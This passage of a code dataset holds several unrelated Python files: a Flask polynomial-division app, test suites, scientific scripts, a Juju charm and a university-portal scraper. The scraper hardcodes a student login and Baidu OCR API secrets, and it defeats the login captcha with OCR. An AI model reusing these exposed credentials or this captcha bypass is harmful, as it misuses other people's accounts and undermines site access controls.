provided, return apology\n if not request.form.get(\"second\"):\n return apology(\"must provide the degree of the divisor\")\n \n # extract the degree of the divisor from the request form\n second = int(request.form.get(\"second\"))\n \n # if degrees less than 0, return apology\n if first <= 0:\n return apology(\"must provide positive integers\")\n \n if second <= 0:\n return apology(\"must provide positive integers\")\n \n # if the degree of divisor is greater than the degree of the dividend, return apology\n if second > first:\n return apology(\"the degree of the divisor cannot be greater than the degree of the divisor\")\n \n # store the degrees of both polynomials as session variables\n session[\"first\"] = first\n session[\"second\"] = second\n \n # redirect user to the page where they can input the coefficients of the polynomials\n return redirect(url_for(\"coefficients\"))\n\n@app.route(\"/coefficients\", methods=[\"GET\", \"POST\"])\ndef coefficients():\n \"\"\" Type the coefficients of the dividend and divisor \"\"\"\n \n # extract the degrees of both polynomials\n first = session[\"first\"]\n second = session[\"second\"] \n \n # render the template \"coefficients\"\n if request.method == \"GET\":\n\n return render_template(\"coefficients.html\", first = first, second = second)\n\n if request.method == \"POST\":\n \n # declare the list of coefficients of the dividend and divisor\n dividend = []\n divisor = []\n \n # iterate over the coefficients of the dividend\n for i in range(first+1):\n \n # access the coefficient from the website\n coefficient = request.form.get(str(i))\n\n # if no coefficient provided, return apology\n if not coefficient:\n return apology(\"must provide a coefficient\")\n \n # else append the coefficient to the list of dividend coefficients\n else:\n dividend.append(float(coefficient))\n\n # iterate over the coefficients of the divisor\n for i in range(second+1):\n \n # 
access the coefficient from the website\n coefficient = request.form.get(\"b\" + str(i))\n\n # if no coefficient provided, return apology\n if not coefficient:\n return apology(\"must provide a coefficient\")\n \n # else append the coefficient to the list of divisor coefficients\n else:\n divisor.append(float(coefficient))\n \n # store the coefficients of the dividend and divisor as session variables\n session[\"dividend\"] = dividend\n session[\"divisor\"] = divisor\n\n # redirect the user to the page where they can see the result of the division\n return redirect(url_for(\"division\"))\n\n@app.route(\"/division\", methods=[\"GET\"])\ndef division():\n \"\"\" Shows the result of the division \"\"\"\n \n # extract the coefficients of the dividend and divisor\n dividend = session[\"dividend\"]\n divisor = session[\"divisor\"]\n \n # perform the division\n result = polynomial(dividend, divisor) \n \n # the function \"polynomial\" returns the list of two elements\n # the first element in this list is the list of quotient coefficients, and the second one is the list of remainder coefficients\n quotient = result[0]\n remainder = result[1]\n \n # render a template with results\n return render_template(\"division.html\", len1 = len(dividend), len2 = len(divisor), len3 = len(quotient), len4 = len(remainder), dividend = dividend, divisor = divisor, quotient = quotient, remainder = remainder)\n\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"165861340","text":"# -*- coding: utf-8 -*-\n'''\nSmoothtest\nCopyright (c) 2014 Juju. Inc\n\nCode Licensed under MIT License. See LICENSE file.\n'''\nimport unittest\nfrom smoothtest.webunittest.WebdriverManager import WebdriverManager\nfrom smoothtest.Logger import Logger\nfrom smoothtest.webunittest.XpathBrowser import XpathBrowser\nimport os\nfrom contextlib import contextmanager\nfrom smoothtest.settings.default import SINGLE_TEST_LIFE\n\n\nclass WebUnitTestBase(unittest.TestCase):\n\n def _get_local_html_path(self, name):\n return os.path.join(os.path.dirname(__file__), 'html', name)\n\n def _local_path_to_url(self, path):\n return 'file://' + path\n\n def get_local_page(self, path):\n self.browser.get_url(self._local_path_to_url(path))\n\n @contextmanager\n def create_html(self, name, body, jquery=True, **kwargs):\n templ = '''\n\n\n\n {jquery}\n {name}\n\n\n {body}\n\n\n '''\n if jquery:\n jquery = ''\n else:\n jquery = ''\n \n kwargs.update(locals())\n html = templ.format(**kwargs)\n path = self._get_local_html_path(name + '.html')\n with open(path, 'w') as fh:\n fh.write(html)\n try:\n yield path\n except:\n raise\n finally:\n os.remove(path)\n\n def setUp(self):\n self.__level_mngr = WebdriverManager().enter_level(level=SINGLE_TEST_LIFE)\n webdriver = self.__level_mngr.acquire_driver()\n logger = Logger(__name__)\n self.browser = XpathBrowser('', webdriver, logger, settings={})\n\n def tearDown(self):\n self.__level_mngr.exit_level()\n\n\ndef smoke_test_module():\n pass \n\nif __name__ == \"__main__\":\n smoke_test_module()\n","sub_path":"smoothtest/webunittest/tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"525362286","text":"import pytest\nimport asyncio\nfrom aionetworking.formats.contrib.json import JSONObject\nfrom aionetworking.formats.recording import 
get_recording\nfrom aionetworking.utils import alist\n\n\nclass TestJsonCodec:\n\n @pytest.mark.asyncio\n async def test_00_decode(self, json_codec, json_buffer, decoded_result):\n decoded = await alist(json_codec.decode(json_buffer))\n assert decoded == decoded_result\n\n @pytest.mark.asyncio\n async def test_01_encode(self, json_codec, json_rpc_login_request, json_rpc_login_request_encoded):\n encoded = await json_codec.encode(json_rpc_login_request)\n assert encoded == json_rpc_login_request_encoded\n\n @pytest.mark.asyncio\n async def test_02_decode_buffer(self, json_codec, json_buffer, json_objects, timestamp):\n decoded = await alist(json_codec.decode_buffer(json_buffer, system_timestamp=timestamp))\n assert decoded == json_objects\n\n @pytest.mark.asyncio\n async def test_03_encode_obj(self, json_codec, json_rpc_login_request, json_object, timestamp):\n encoded = await json_codec.encode_obj(json_rpc_login_request, system_timestamp=timestamp)\n assert encoded == json_object\n\n @pytest.mark.asyncio\n async def test_04_from_file_many(self, json_codec, file_containing_multi_json, json_objects, timestamp):\n objects = json_codec.from_file(file_containing_multi_json, system_timestamp=timestamp)\n assert await alist(objects) == json_objects\n\n @pytest.mark.asyncio\n async def test_05_from_file(self, json_codec, file_containing_multi_json, json_object, timestamp):\n obj = await json_codec.one_from_file(file_containing_multi_json, system_timestamp=timestamp)\n assert obj == json_object\n await asyncio.get_event_loop().shutdown_asyncgens()\n\n\nclass TestJsonObject:\n def test_00_get_codec(self, json_buffer, json_codec, context):\n codec = JSONObject.get_codec(json_buffer, context=context)\n assert codec == json_codec\n\n def test_01_properties(self, json_object, timestamp, client_sock, client_sock_str, client_hostname):\n assert json_object.peer == client_sock_str\n assert json_object.address == client_sock[0]\n assert json_object.sender == client_hostname\n assert json_object.uid == 1\n assert json_object.request_id == 1\n assert json_object.timestamp == timestamp\n assert str(json_object) == 'JSON 1'\n\n def test_02_filter(self, json_object):\n assert json_object.filter() is False\n\n def test_03_json_object_with_codec_kwargs(self, json_buffer, json_object_with_codec_kwargs, json_codec_with_kwargs):\n codec = json_object_with_codec_kwargs.get_codec(json_buffer, test_param='abc')\n assert codec == json_codec_with_kwargs\n\n\nclass TestBufferObject:\n @pytest.mark.asyncio\n async def test_00_buffer_recording(self, buffer_codec, json_encoded_multi, json_recording_data, context, timestamp):\n buffer_obj1 = await buffer_codec.encode_obj(json_encoded_multi[0], system_timestamp=timestamp)\n buffer_obj2 = await buffer_codec.encode_obj(json_encoded_multi[1], system_timestamp=timestamp)\n recording = buffer_obj1.encoded + buffer_obj2.encoded\n packets = await alist(get_recording(recording))\n assert packets == json_recording_data\n","sub_path":"tests/test_formats/test_json.py","file_name":"test_json.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"87771438","text":"import sys\r\nimport logging\r\n# logging.basicConfig(format=\" %(message)s\", level=logging.DEBUG)\r\n\r\ntestCases = int(input()) \r\n \r\nfor testCase in range(1, testCases + 1):\r\n\r\n n = int(input())\r\n p = list(map(int, sys.stdin.readline().strip().split())) \r\n a = []; ai = 0;\r\n\r\n logging.debug(\"Case #\" + str(testCase) + 
\": \") \r\n \r\n logging.debug(\" N: \"+str(n))\r\n logging.debug(\" P: \"+str(p))\r\n \r\n s = sum(p)\r\n while (s > 0):\r\n m = max(p)\r\n i = p.index(m)\r\n s -= 1\r\n p[i] -= 1;\r\n nm = max(p)\r\n\r\n a.append(str(chr(ord('A')+i)))\r\n \r\n logging.debug(\" Removing \"+str(i)+\" (sum = \"+str(s)+\", max = \"+str(nm)+\") AI: \"+str(a[ai])+\" P: \"+str(p))\r\n if ((s > 2) or (s == 1)) and (nm == m):\r\n i = p.index(m)\r\n s -= 1\r\n p[i] -= 1\r\n nm = max(p) \r\n a[ai] += str(chr(ord('A')+int(i)))\r\n logging.debug(\" Also removing \"+str(i)+\" (sum = \"+str(s)+\", max = \"+str(nm)+\") AI: \"+str(a[ai])+\" P: \"+str(p))\r\n \r\n ai += 1\r\n \r\n print(\"Case #\" + str(testCase) + \": \" + \" \".join(a))\r\n \r\n","sub_path":"solutions_5753053697277952_1/Python/SpaceDog/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"549948483","text":"\"\"\"Tests for the models in the ``core`` app of the Marsha project.\"\"\"\nfrom django.core.exceptions import ValidationError\nfrom django.test import TestCase\n\nfrom safedelete.models import SOFT_DELETE_CASCADE\n\nfrom ..factories import PlaylistFactory\n\n\n# We don't enforce arguments documentation in tests\n# pylint: disable=missing-param-doc,missing-type-doc,unused-argument\n\n\nclass PlaylistModelsTestCase(TestCase):\n \"\"\"Test our intentions about the Playlist model.\"\"\"\n\n def test_models_playlist_str(self):\n \"\"\"The str method should display the playlist title and its eventual soft deletion.\"\"\"\n playlist = PlaylistFactory(title=\"ça joue\")\n self.assertEqual(str(playlist), \"ça joue\")\n\n playlist.delete()\n self.assertEqual(str(playlist), \"ça joue [deleted]\")\n\n def test_models_playlist_fields_lti_id_unique(self):\n \"\"\"Playlists should be unique for a given duo: lti_id/playlist.\"\"\"\n playlist = PlaylistFactory()\n\n # A playlist with a different lti_id and the same consumer site can still be created\n PlaylistFactory(consumer_site=playlist.consumer_site)\n\n # A playlist for a different consumer site and the same lti_id can still be created\n PlaylistFactory(lti_id=playlist.lti_id)\n\n # Trying to create a playlist with the same duo lti_id/consumer site should raise a\n # database error\n with self.assertRaises(ValidationError) as context:\n PlaylistFactory(\n lti_id=playlist.lti_id, consumer_site=playlist.consumer_site\n )\n self.assertEqual(\n context.exception.messages,\n [\"Playlist with this Lti id and Consumer site already exists.\"],\n )\n\n # Soft deleted playlists should not count for unicity\n playlist.delete(force_policy=SOFT_DELETE_CASCADE)\n PlaylistFactory(lti_id=playlist.lti_id, consumer_site=playlist.consumer_site)\n","sub_path":"src/backend/marsha/core/tests/test_models_playlist.py","file_name":"test_models_playlist.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"588476168","text":"\n\nfrom xai.brain.wordbase.verbs._date import _DATE\n\n#calss header\nclass _DATING(_DATE, ):\n\tdef __init__(self,): \n\t\t_DATE.__init__(self)\n\t\tself.name = \"DATING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"date\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_dating.py","file_name":"_dating.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"147820612","text":"import 
urllib.request as ur\nimport matplotlib.pyplot as plt\n# import cStringIO\nimport requests\nimport csv\nfrom PIL import Image\nfrom aip import AipOcr\n\nimport json\n\n\ndef scu_main():\n login_cookies = login()\n xuanke_result(login_cookies)\n look_grade(login_cookies)\n\n\ndef login():\n check_url = \"http://zhjw.scu.edu.cn/j_spring_security_check\"\n headers = { # 请求头请求刷新验证码和发送post时需要使用\n 'Host': 'zhjw.scu.edu.cn',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n 'Accept-Encoding': 'gzip, deflate',\n 'Referer': \"http://zhjw.scu.edu.cn/login\",\n 'Connection': 'keep-alive'\n }\n yzm, response = showpicture()\n username = input(\"your user name: \")\n password = input(\"ypur pass word: \")\n data = {\n \"j_username\": \"2017141463014\",\n \"j_password\": \"121694\",\n \"j_captcha\": yzm\n }\n login_cookies = requests.utils.dict_from_cookiejar(response.cookies)\n resp = requests.post(check_url, headers=headers, cookies=login_cookies, data=data)\n print(resp.status_code)\n return login_cookies\n\n\ndef xuanke_result(login_cookies):\n headers = { # 请求头请求刷新验证码和发送post时需要使用\n 'Host': 'zhjw.scu.edu.cn',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n 'Accept-Encoding': 'gzip, deflate',\n 'Referer': \"http://zhjw.scu.edu.cn/student/courseSelect/courseSelectResult/index\",\n 'Connection': 'keep-alive'\n # 'Cookie':'selectionBar=1293219; JSESSIONID=bcd-C3VpyAu4E-yypBxIw; SPRING_SECURITY_REMEMBER_ME_COOKIE=NFVSd1R0VktQSUcxMTQ5MmtIQ2FNdz09OmtlMVhUZnFOaEozZWZxbjB3NWhNa1E9PQ'\n }\n xuankeresult_url = 'http://zhjw.scu.edu.cn/student/courseSelect/thisSemesterCurriculum/callback'\n # selectionBar=1293219\n xuanke_cookie = {'selectionBar': '1293219'}\n xuanke_cookie.update(login_cookies)\n resp = requests.get(xuankeresult_url, headers=headers)\n data = json.loads(resp.text)\n courselist = {}\n courselist = data['xkxx'][0]\n itemlist = list(courselist[list(courselist.keys())[0]].keys())\n valuelist = []\n for course in courselist:\n valuelist.append(list(courselist[course].values()))\n with open('course.csv', 'w', encoding=\"gbk\", newline='') as f:\n writer = csv.writer(f)\n writer.writerow(itemlist)\n for course in valuelist:\n writer.writerow(course)\n\n\ndef look_grade(login_cookies):\n grade_headers = {\n 'Host': 'zhjw.scu.edu.cn',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n 'Accept-Encoding': 'gzip, deflate',\n 'Referer': \"http://zhjw.scu.edu.cn/student/integratedQuery/scoreQuery/allTermScores/index\",\n 'Connection': 'keep-alive'\n }\n # selectionBar = 125803405\n grade_cookies = {'selectionBar': '125803405'} # 查成绩的selectionBar\n grade_cookies.update((login_cookies))\n grade_url = 'http://zhjw.scu.edu.cn/student/integratedQuery/scoreQuery/allTermScores/data'\n resp = requests.get(grade_url, cookies=grade_cookies, headers=grade_headers)\n data = json.loads(resp.text) # 转化为json对象\n grades = data['list']['records']\n title = ['学期', '课程号', '课序号', '结束时间', '未知', '未知', 
'未知', '未知', '成绩', '未知', '未知', '课程名', '课程名', '学分', '学时', '类型', '类型',\n '绩点']\n mark = {'A': 4, 'A-': 3.7, 'B+': 3.3, 'B': 3, 'B-': 2.7, 'C+': 2.3, 'C': 2, 'C-': 1.7, 'D+': 1.3, 'D': 1, 'F': 0}\n with open('grade.csv', 'w', encoding=\"gbk\", newline='') as f:\n writer = csv.writer(f)\n writer.writerow(title)\n for grade in grades:\n grade[17] = mark[grade[17]]\n writer.writerow(grade)\n\n\ndef ocrauto():\n App_id = '15506822'\n Api_key = '1o6gogL5H5wkKsUXAAEAdwAI'\n secret_key = 'XG3WacNfn3NoDOd6RwrPz60qChyppI5C'\n client = AipOcr(appId=App_id, apiKey=Api_key, secretKey=secret_key)\n \"\"\" 读取图片 \"\"\"\n with open(\"yzm.png\", 'rb') as fp:\n image = fp.read()\n \"\"\" 如果有可选参数 \"\"\"\n options = {}\n options[\"language_type\"] = \"ENG\"\n options[\"detect_direction\"] = \"false\"\n options[\"detect_language\"] = \"false\"\n options[\"probability\"] = \"true\"\n\n \"\"\" 带参数调用通用文字识别, 图片参数为本地图片 \"\"\"\n result = client.basicGeneral(image, options)\n yzm = result['words_result'][0]['words']\n print(result,yzm)\n return yzm\n\n\ndef showpicture():\n yzm_url = 'http://zhjw.scu.edu.cn/img/captcha.jpg'\n response = requests.get(yzm_url)\n with open(\"yzm.png\", \"wb\") as f:\n f.write(response.content)\n \"\"\"\n img = Image.open('yzm.png')\n plt.figure(\"yzm\")\n plt.imshow(img)\n plt.show()\n yzm = input(\"请输入验证码: \")\n \"\"\"\n yzm = ocrauto()\n return (yzm, response)\n\n\nif __name__ == '__main__':\n scu_main()\n","sub_path":"scu-jwc.py","file_name":"scu-jwc.py","file_ext":"py","file_size_in_byte":5524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"487043465","text":"'''\nCompute IMERG accumulated precipitation for RRA domain.\n'''\nimport os\nimport util as ut\nimport util_imerg as utimerg\nimport time\nimport h5py as h5py\nimport numpy as np\n\nINITIME = '20181110000000'\nENDTIME = '20181111000000'\nACUM = 3600 #period of accumulation in seconds\nDATAFREQ = 1800 #frequency of files in seconds\nDOMAIN = 'RRA'\n\n# --------------------------------------------------------- #\nbasedir = '/home/paula.maldonado/datosalertar1/RRA_VERIF'\nDATADIR = basedir + '/data/imerg_raw'\n\nstart = time.time()\n\n#Get a list of files to calculate accumulation \nfilelist = utimerg.get_files(DATADIR, INITIME, ENDTIME, ACUM, DATAFREQ)\n\nfor key in filelist.keys():\n print('Accumulation time: ', key) \n acum_pp = 0\n\n # Compute accumulate\n for ifile, filepath in enumerate(filelist[key]):\n lats, lons, precip = utimerg.read_imerg_pp(filepath, limits=[-37.95, -26.05, -65.95, -57.05]) \n lon, lat = np.float32(np.meshgrid(lons, lats))\n acum_pp += precip\n\n # Write data to npz file\n pathout = basedir + '/data/imerg_' + DOMAIN + '_' + str(int(ACUM/3600)) + 'hr_accumulated'\n os.makedirs(pathout, exist_ok=True)\n fileout = pathout + '/' + key\n np.savez(fileout, lat=lat, lon=lon, pp=acum_pp)\n\nend = time.time()\n\nprint('')\nprint('It took ', end-start, ' seconds')\n\n","sub_path":"python/others/compute_imerg_acum.py","file_name":"compute_imerg_acum.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"285423257","text":"from django.conf.urls import patterns, url\nfrom .views import qunit_views, qunit_tests_list_json, settings_json\n\n\n# Add registered qunit tests\nurlpatterns = patterns('',\n *(\n url(r'^jstest/%s' % name, qunit_view, name='jstest_%s' % name)\n for name, qunit_view in qunit_views.iteritems()\n )\n)\n\nurlpatterns += patterns('', \n 
url(r'^jstest_list', qunit_tests_list_json),\n url(r'^api/settings.json', settings_json, name='settings_json'),\n)\n","sub_path":"geotrek/common/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"68879358","text":"import os\nfrom pathlib import Path\nfrom subprocess import run\n\nfrom charms import layer\nfrom charms.reactive import clear_flag, hook, set_flag, when, when_any, when_not\n\n\n@hook(\"upgrade-charm\")\ndef upgrade_charm():\n clear_flag(\"charm.started\")\n\n\n@when(\"charm.started\")\ndef charm_ready():\n layer.status.active(\"\")\n\n\n@when_any(\n \"layer.docker-resource.mixer-image.changed\",\n \"layer.docker-resource.proxy-image.changed\",\n)\ndef update_image():\n clear_flag(\"charm.started\")\n\n\n@when(\n \"layer.docker-resource.mixer-image.available\",\n \"layer.docker-resource.proxy-image.available\",\n)\n@when_not(\"charm.started\")\ndef start_charm():\n layer.status.maintenance(\"configuring container\")\n\n mixer_image = layer.docker_resource.get_info(\"mixer-image\")\n proxy_image = layer.docker_resource.get_info(\"proxy-image\")\n\n model = os.environ[\"JUJU_MODEL_NAME\"]\n\n run(\n [\n \"openssl\",\n \"req\",\n \"-x509\",\n \"-newkey\",\n \"rsa:4096\",\n \"-keyout\",\n \"key.pem\",\n \"-out\",\n \"cert.pem\",\n \"-days\",\n \"365\",\n \"-subj\",\n \"/CN=localhost\",\n \"-nodes\",\n ],\n check=True,\n )\n\n layer.caas_base.pod_spec_set(\n {\n \"version\": 2,\n \"containers\": [\n {\n \"name\": \"mixer\",\n \"args\": [\n \"--monitoringPort=15014\",\n \"--address\",\n \"unix:///sock/mixer.socket\",\n \"--log_output_level=default:info\",\n f\"--configStoreURL=mcp://istio-galley.{model}.svc:9901\",\n \"--certFile=/etc/certs/cert-chain.pem\",\n \"--keyFile=/etc/certs/key.pem\",\n \"--caCertFile=/etc/certs/root-cert.pem\",\n f\"--configDefaultNamespace={model}\",\n \"--useAdapterCRDs=false\",\n \"--trace_zipkin_url=http://zipkin:9411/api/v1/spans\",\n \"--averageLatencyThreshold\",\n \"100ms\",\n \"--loadsheddingMode\",\n \"enforce\",\n ],\n \"imageDetails\": {\n \"imagePath\": mixer_image.registry_path,\n \"username\": mixer_image.username,\n \"password\": mixer_image.password,\n },\n \"config\": {\"GODEBUG\": \"gctrace=1\", \"GOMAXPROCS\": \"6\"},\n \"ports\": [\n {\"name\": \"port-1\", \"containerPort\": 15014},\n {\"name\": \"port-2\", \"containerPort\": 42422},\n ],\n \"files\": [\n {\n \"name\": \"istio-certs\",\n \"mountPath\": \"/etc/certs\",\n \"files\": {\n \"cert-chain.pem\": Path(\"cert.pem\").read_text(),\n \"key.pem\": Path(\"key.pem\").read_text(),\n },\n },\n # {\n # \"name\": \"telemetry-adapter-secret\",\n # \"mountPath\": \"/var/run/secrets/istio.io/telemetry/adapter\",\n # \"files\": {},\n # },\n ],\n },\n {\n \"name\": \"proxy\",\n \"args\": [\n \"proxy\",\n \"--domain\",\n f\"{model}.svc.cluster.local\",\n \"--serviceCluster\",\n \"istio-telemetry\",\n \"--templateFile\",\n \"/etc/istio/proxy/envoy_telemetry.yaml.tmpl\",\n \"--controlPlaneAuthPolicy\",\n \"NONE\",\n ],\n \"imageDetails\": {\n \"imagePath\": proxy_image.registry_path,\n \"username\": proxy_image.username,\n \"password\": proxy_image.password,\n },\n \"config\": {\n \"POD_NAME\": {\"field\": {\"path\": \"metadata.name\", \"api-version\": \"v1\"}},\n \"POD_NAMESPACE\": model,\n \"INSTANCE_IP\": {\n \"field\": {\"path\": \"status.PodIP\", \"api-version\": \"v1\"}\n },\n \"SDS_ENABLED\": False,\n },\n \"ports\": [\n {\"name\": \"port-3\", \"containerPort\": 
9091},\n {\"name\": \"port-4\", \"containerPort\": 15004},\n # {\n # \"name\": \"http-envoy-prom\",\n # \"containerPort\": 15090,\n # \"protocol\": \"TCP\",\n # },\n ],\n \"files\": [\n {\n \"name\": \"istio-certs2\",\n \"mountPath\": \"/etc/certs\",\n \"files\": {\n \"cert-chain.pem\": Path(\"cert.pem\").read_text(),\n \"key.pem\": Path(\"key.pem\").read_text(),\n },\n }\n ],\n },\n ],\n }\n )\n\n layer.status.maintenance(\"creating container\")\n set_flag(\"charm.started\")\n","sub_path":"charms/istio-telemetry/reactive/charm.py","file_name":"charm.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"436955554","text":"import sys\nfrom xml.dom.minidom import parse\nimport time\nimport matrixops\n\n\ndom = parse(sys.argv[1])\nkol = 0\nflag = 0\ndom = dom.childNodes[0]\nfor child in dom.childNodes:\n if child.nodeType == dom.ELEMENT_NODE:\n if child.nodeName == \"net\":\n kol += 1\n else:\n if flag == 0:\n matr = [] # исходная таблица сопротивлений между узлами\n for j in range(kol):\n matr1 = []\n for i in range(kol):\n if i != j:\n # инициализация таблицы значениями inf\n matr1.append(float(\"+inf\")) \n else:\n matr1.append(0) # 0 на главной диагонале\n matr.append(matr1)\n flag=1\n \n atts = child.attributes\n if child.nodeName == \"diode\":\n res1 = float(\"+inf\")\n res2 = float(\"+inf\")\n for k, v in atts.items():\n if k == \"net_from\":\n i = int(v) - 1\n elif k == \"net_to\":\n j = int(v) - 1\n elif k == \"resistance\":\n res1 = float(v)\n else:\n res2 = float(v)\n # обработка деления на 0 \n if 1 / res1 + 1 / matr[i][j] == 0 or 1 / res2 + 1 / matr[i][j] == 0:\n matr[i][j] = float(\"+inf\")\n matr[j][i] = float(\"+inf\")\n else:\n matr[i][j] = 1 / (1 / res1 + 1 / matr[i][j])\n matr[j][i] = 1 / (1 / res2 + 1 / matr[j][i])\n else: # \"resistor\" и \"capactor\"\n res = float(\"+inf\")\n for k, v in atts.items():\n if k == \"net_from\":\n i = int(v) - 1\n elif k == \"net_to\":\n j = int(v) - 1\n else:\n res = float(v)\n if 1 / res + 1 / matr[i][j] == 0:\n matr[i][j] = float(\"+inf\")\n matr[j][i] = float(\"+inf\")\n else:\n matr[i][j] = 1 / (1 / res + 1 / matr[i][j])\n matr[j][i] = matr[i][j]\nmatr_cxx = []\nstart_cxx = time.time()\nmatr_cxx = matrixops.f_w_algorithm(matr)\nfinish_cxx= time.time()\nprint(start_cxx)\nprint(finish_cxx)\nstart_py = time.time() \n# рассчет сопртивлений по алгоритму Флойда-Уоршела\nfor k in range(len(matr)):\n for i in range(len(matr)):\n for j in range(len(matr)):\n if matr[i][j] == 0:\n a = float(\"+inf\")\n else:\n a = 1 / matr[i][j]\n if matr[i][k] == 0 and matr[k][j] == 0:\n b = float(\"+inf\")\n else:\n b = 1 / (matr[i][k] + matr[k][j])\n if a + b == 0:\n matr[i][j] = float(\"+inf\")\n else:\n matr[i][j] = 1 / (a + b)\nfinish_py = time.time()\n \n# запись таблицы в файл\nwith open(sys.argv[2],\"w\") as fd:\n for i in range(len(matr)):\n for j in range(len(matr)):\n if j != len(matr) - 1:\n fd.write(str(round(matr[i][j]- matr_cxx[i][j],6)) + ', ')\n else:\n fd.write(str(round(matr[i][j] - matr_cxx[i][j],6)) + \"\\n\")\n \n# запись таблицы в файл\nwith open(sys.argv[3],\"w\") as fd:\n for i in range(len(matr_cxx)):\n for j in range(len(matr_cxx)):\n if j != len(matr_cxx) - 1:\n fd.write(str(round(matr_cxx[i][j],6)) + ', ')\n else:\n fd.write(str(round(matr_cxx[i][j],6)) + \"\\n\")\n \nprint((finish_py - start_py)/(finish_cxx - start_cxx)) # время работы программы\n\n\n\n 
\n","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"382625066","text":"from deck import *\nimport unittest\n\nclass TestDeckModule(unittest.TestCase):\n\t\t\n\tdef setUp(self):\n\t\t# count of deck\n\t\tself.deckCount = 2\n\t\t# 2-10 + JQKA, with faces CDHS\n\t\tself.cardCount = (9 + 4) * 4 * self.deckCount\n\t\t# deck for test\n\t\tself.deck = Deck(self.deckCount)\n\t\n\tdef test_cardCount(self):\n\t\tself.assertEqual(len(self.deck.cards), self.cardCount)\n\t\n\tdef test_next(self):\n\t\tfor index in range(self.cardCount):\n\t\t\tcard = self.deck.cards[self.cardCount - index - 1]\n\t\t\tself.assertEqual(self.deck.next(), card)\n\nif __name__=='__main__':\n\tunittest.main()","sub_path":"Session 3.1/deck_test.py","file_name":"deck_test.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"467652010","text":"#!/usr/bin/python2\n# -*- coding: utf8 -*-\n\nimport os\n\nfrom PyQt4 import QtGui, QtCore\n\nfrom GUI.SplitPane import SplitPane\nfrom GUI.Controller import Controller\nfrom GUI.LightPanel import AddLightPanel,RemoveLightPanel\nfrom GUI.AlgoPanel import AlgoPanel\n\n\nclass MainWindow(QtGui.QMainWindow):\n \"\"\" This class is the GUI's main class \"\"\"\n def __init__(self):\n \"\"\"Constructor of the class MainWindow\"\"\"\n super(MainWindow, self).__init__()\n # The GUI controller\n self._controller = Controller(self)\n # init the GUI\n self.initUI()\n \n def initUI(self): \n \"\"\" This methode will initiate the GUI :\n - The Menu bar\n - The toorls bar\n - The main SplitPane\n - The statusBar \n \"\"\" \n # Windows title\n self.setWindowTitle(\"Les ombres au sein des jeux et des animations\")\n\n self._statusBar = self.statusBar()\n self._statusBar.showMessage('Welcome!')\n self._controller.initStatusBar(self._statusBar)\n\n ex = SplitPane(self._controller)\n self.setCentralWidget(ex)\n\n self.initToolsBar()\n self.initMenu()\n \n self.showMaximized()\n\n def closeApp(self):\n \"\"\" \"\"\"\n self.close()\n self._controller.killThreads()\n #exit()\n #os.system(\"kill -9 \" + os.getpid()) # hihi\n\n def displayHelp(self):\n \"\"\" \"\"\"\n QtGui.QMessageBox.information(self, \"Aide\", \"Pour utiliser le programme, veuillez choisir une scene dans la vue en arbre de gauche et un algorithme compatible.\")\n\n def displayAbout(self):\n \"\"\" Display some info\"\"\"\n QtGui.QMessageBox.information(self, \"A propos\", \"Printemps des sciences 2015\" + \"\\n\\n\" + \"Pierre Gerard, Bruno Rocha Pereira, Antoine Carpentier\" + \"\\n\\n\" + \"Dans ce projet nous examinons le domaine des algorithmes de rendu d'ombre et nous en comparerons quelques-uns dans un environnement de simulation 3D comme le OpenGL. 
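[Editor's note] The triple loop in compare.py is a Floyd-Warshall relaxation where each update combines the direct resistance with the series path through k, taken in parallel. The arithmetic is easier to follow with the parallel combination factored out; a sketch assuming non-negative resistances, with math.inf standing for "no connection":

import math

def parallel(r1, r2):
    # Equivalent resistance of r1 and r2 in parallel; math.inf = open circuit.
    if math.isinf(r1):
        return r2
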